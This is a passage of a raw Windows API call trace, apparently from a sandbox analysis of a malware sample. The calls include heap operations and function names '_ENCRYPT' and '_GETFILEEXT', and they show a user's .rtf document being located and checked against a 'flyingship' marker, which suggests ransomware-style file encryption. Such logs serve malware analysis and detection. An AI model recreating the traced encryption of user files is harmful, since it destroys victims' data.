| out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0178.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0178.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0178.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0178.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0178.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0178.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0178.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.704] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0178.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0178.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0178.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0178.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0178.705] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0178.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0178.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0178.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0178.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0178.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0178.706] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0178.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0178.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.706] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd990 [0178.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd990, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0178.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.707] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0178.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0178.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0178.707] CloseHandle (hObject=0x120) returned 1 [0178.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0178.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0178.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0178.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0178.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.708] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0178.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0178.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0178.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0178.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0178.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0178.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0178.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.709] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0178.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0178.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0178.709] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0178.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0178.709] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0178.709] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0178.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0178.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.709] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0178.709] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0178.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0178.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0178.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0178.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.710] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.710] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0178.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0178.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.710] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.710] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.710] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x581b1190, ftCreationTime.dwHighDateTime=0x1d5ddd1, ftLastAccessTime.dwLowDateTime=0xd7475ce0, ftLastAccessTime.dwHighDateTime=0x1d5dae2, ftLastWriteTime.dwLowDateTime=0xd7475ce0, ftLastWriteTime.dwHighDateTime=0x1d5dae2, nFileSizeHigh=0x0, nFileSizeLow=0xa052, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="1usRK9.rtf", cAlternateFileName="")) returned 0x90add8 [0178.712] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0178.712] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.712] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x581b1190, ftCreationTime.dwHighDateTime=0x1d5ddd1, ftLastAccessTime.dwLowDateTime=0xd7475ce0, ftLastAccessTime.dwHighDateTime=0x1d5dae2, ftLastWriteTime.dwLowDateTime=0xd7475ce0, ftLastWriteTime.dwHighDateTime=0x1d5dae2, nFileSizeHigh=0x0, nFileSizeLow=0xa052, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="1usRK9.rtf", cAlternateFileName="")) returned 0x90add8 [0178.712] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0178.712] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.713] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.713] CompareStringW (Locale=0x400, 